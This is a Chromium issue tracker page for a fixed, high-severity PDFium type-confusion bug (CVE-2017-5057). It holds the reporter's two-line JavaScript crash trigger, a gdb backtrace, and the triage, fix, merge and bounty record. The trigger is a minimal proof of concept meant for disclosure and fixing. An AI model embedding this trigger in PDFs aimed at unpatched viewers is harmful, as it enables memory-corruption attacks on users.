Project: chromium Issues People Development process History Sign in
New issue
Advanced search Search tips
Starred by 2 users
Status: Fixed
Owner:
Closed: Mar 2017
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security



Sign in to add a comment
Security: type confusion in JSPropGetter of pdfium
Reported by higonggu...@gmail.com, Feb 24 2017 Back to list
VULNERABILITY DETAILS
embed the following simple JavaScript into a PDF
var obj = new this.constructor;
obj.author=3;
open it in Chrome, you'll see the crashed pdfviewer plugin

the constructor of the document object(or app,console,global etc) should not been exported to user JavaScript. when an object is created with these constructors, the internal fields of the objects is not initialized, call any access property will cause a type confusion. the crash is as follows:
Program received signal SIGSEGV, Segmentation fault.
0x000000000078c8f5 in std::unique_ptr<CJS_EmbedObj, std::default_delete<CJS_EmbedObj> >::get (this=0xe97ff80000000008)
    at ../../build/linux/debian_wheezy_amd64-sysroot/usr/lib/gcc/x86_64-linux-gnu/4.6/../../../../include/c++/4.6/bits/unique_ptr.h:217
217	      { return std::get<0>(_M_t); }
(gdb) bt
#0  0x000000000078c8f5 in std::unique_ptr<CJS_EmbedObj, std::default_delete<CJS_EmbedObj> >::get (this=0xe97ff80000000008)
    at ../../build/linux/debian_wheezy_amd64-sysroot/usr/lib/gcc/x86_64-linux-gnu/4.6/../../../../include/c++/4.6/bits/unique_ptr.h:217
#1  0x000000000078c719 in CJS_Object::GetEmbedObject (this=0xe97ff80000000000) at ../../third_party/pdfium/fpdfsdk/javascript/JS_Object.h:47	
#2  0x00000000007c111b in JSPropGetter<Document, &Document::author> (prop_name_string=0x91ad23 "author", class_name_string=0x91ad1a "Document", property=..., info=...)
    at ../../third_party/pdfium/fpdfsdk/javascript/JS_Define.h:84
#3  0x00000000007bcf41 in CJS_Document::get_author_static (property=..., info=...) at ../../third_party/pdfium/fpdfsdk/javascript/Document.h:306
#4  0x00007ffff747d46d in v8::internal::PropertyCallbackArguments::Call (this=<optimized out>, f=<optimized out>, name=...) at ../../v8/src/api-arguments-inl.h:32
#5  0x00007ffff7529de7 in v8::internal::Object::GetPropertyWithAccessor (it=<optimized out>) at ../../v8/src/objects.cc:1353
#6  0x00007ffff7529079 in v8::internal::Object::GetProperty (it=<optimized out>) at ../../v8/src/objects.cc:999
#7  0x00007ffff7465c93 in v8::internal::LoadIC::Load (this=<optimized out>, object=..., name=...) at ../../v8/src/ic/ic.cc:644
#8  0x00007ffff7472c37 in v8::internal::__RT_impl_Runtime_LoadIC_Miss (args=..., isolate=<optimized out>) at ../../v8/src/ic/ic.cc:2615
#9  0x00007ffff747280a in v8::internal::Runtime_LoadIC_Miss (args_length=<optimized out>, args_object=<optimized out>, isolate=<optimized out>)
    at ../../v8/src/ic/ic.cc:2598

a poc is attached as poc1.pdf

VERSION
Chrome Version: [56.0.2924.87] + [stable]
Operating System: [any]

 
poc1.pdf
948 bytes Download
Components: Internals>Plugins>PDF
Labels: Security_Impact-Stable
Owner: jochen@chromium.org
Status: Assigned
jochen@, can you please take a look at this as it is V8 and PDFium? Also can you triage as I am not sure what the implication of a type confusion here is?
Comment 2 by tsepez@chromium.org, Feb 24 2017
Cc: thestig@chromium.org dsinclair@chromium.org jochen@chromium.org
Owner: tsepez@chromium.org
CL up at https://pdfium-review.googlesource.com/2839, which fixes the initialization issue.  Hiding the constructor seems more difficult.
Comment 3 by tsepez@chromium.org, Feb 24 2017
Labels: Security_Severity-High
Probably sev high, bad address is uninitialized, and attacker may have some control over it via spraying, etc.
Project Member Comment 4 by sheriffbot@chromium.org, Feb 25 2017
Labels: M-56
Project Member Comment 5 by sheriffbot@chromium.org, Feb 25 2017
Labels: Pri-1
Labels: OS-All
Comment 7 by tsepez@chromium.org, Feb 27 2017
Cc: tsepez@chromium.org
Owner: jochen@chromium.org
CL landed, but over to jochen to check.
Project Member Comment 8 by bugdroid1@chromium.org, Feb 27 2017
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/4d175c2a5ab773d3d65acdf915149bef17ef2371

commit 4d175c2a5ab773d3d65acdf915149bef17ef2371
Author: pdfium-deps-roller <pdfium-deps-roller@chromium.org>
Date: Mon Feb 27 21:22:29 2017

Roll src/third_party/pdfium/ 73c9f3bb3..9162ff85c (2 commits).

https://pdfium.googlesource.com/pdfium.git/+log/73c9f3bb3d82..9162ff85c323

$ git log 73c9f3bb3..9162ff85c --date=short --no-merges --format='%ad %ae %s'
2017-02-24 thestig Fix nits from commit db764708.
2017-02-24 tsepez Fix uninitialized memory read in CJS_Object::GetEmbedObject()

Created with:
  roll-dep src/third_party/pdfium
BUG= 695826 

Documentation for the AutoRoller is here:
https://skia.googlesource.com/buildbot/+/master/autoroll/README.md

If the roll is causing failures, see:
http://www.chromium.org/developers/tree-sheriffs/sheriff-details-chromium#TOC-Failures-due-to-DEPS-rolls

TBR=dsinclair@chromium.org

Review-Url: https://codereview.chromium.org/2720883002
Cr-Commit-Position: refs/heads/master@{#453341}

[modify] https://crrev.com/4d175c2a5ab773d3d65acdf915149bef17ef2371/DEPS

Labels: M-57 M-58
We should merge to M57 once we verify the fix.
Owner: tsepez@chromium.org
Project Member Comment 11 by sheriffbot@chromium.org, Mar 10 2017
Labels: -M-56
Project Member Comment 12 by sheriffbot@chromium.org, Mar 14 2017
tsepez: Uh oh! This issue still open and hasn't been updated in the last 14 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers?

If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one?

If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started.

Thanks for your time! To disable nags, add the Disable-Nags label.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: Merge-Request-57
Status: Fixed
Project Member Comment 14 by sheriffbot@chromium.org, Mar 14 2017
Labels: -Merge-Request-57 Hotlist-Merge-Review Merge-Review-57
This bug requires manual review: Request affecting a post-stable build
Please contact the milestone owner if you have questions.
Owners: amineer@(clank), cmasso@(bling), ketakid@(cros), govind@(desktop)

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Cc: awhalley@chromium.org
+  awhalley@ for M57 merge review. Please note M57 is already in stable and we're only taking critical and safe merges in. Thank you.
There might be a 57 spin early next week, at which point this will have had the required 48 hours in Beta for a stable merge and we should take it.

Note *please* mark bugs as fixed when the fix lands - otherwise it gets missed in the queries that help ensure security bugs get merged as needed.  Thanks! 
There is another security bug labeled with M-57, Maybe you should consider it too.
https://bugs.chromium.org/p/chromium/issues/detail?id=695830
Project Member Comment 18 by sheriffbot@chromium.org, Mar 15 2017
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Labels: reward-topanel
govind@ - good for 57
Labels: -Merge-Review-57 Merge-Approved-57
Approved for 57.  We're cutting our next candidate in a couple hours, please merge immediately.
Labels: -M-57 -Merge-Approved-57
Unfortunately this didn't merge cleanly and the trybots were having problems (though it built locally) - not picking up in 57 out of an abundance of caution.
Labels: -Hotlist-Merge-Review
Labels: -reward-topanel reward-unpaid reward-3000
Nice one! The panel decided to award $3,000 for this bug - cheers!
Labels: -reward-unpaid reward-inprocess
Labels: Release-0-M58
Labels: CVE-2017-5057
Project Member Comment 29 by sheriffbot@chromium.org, Jun 21
Labels: -Restrict-View-SecurityNotify allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Sign in to add a comment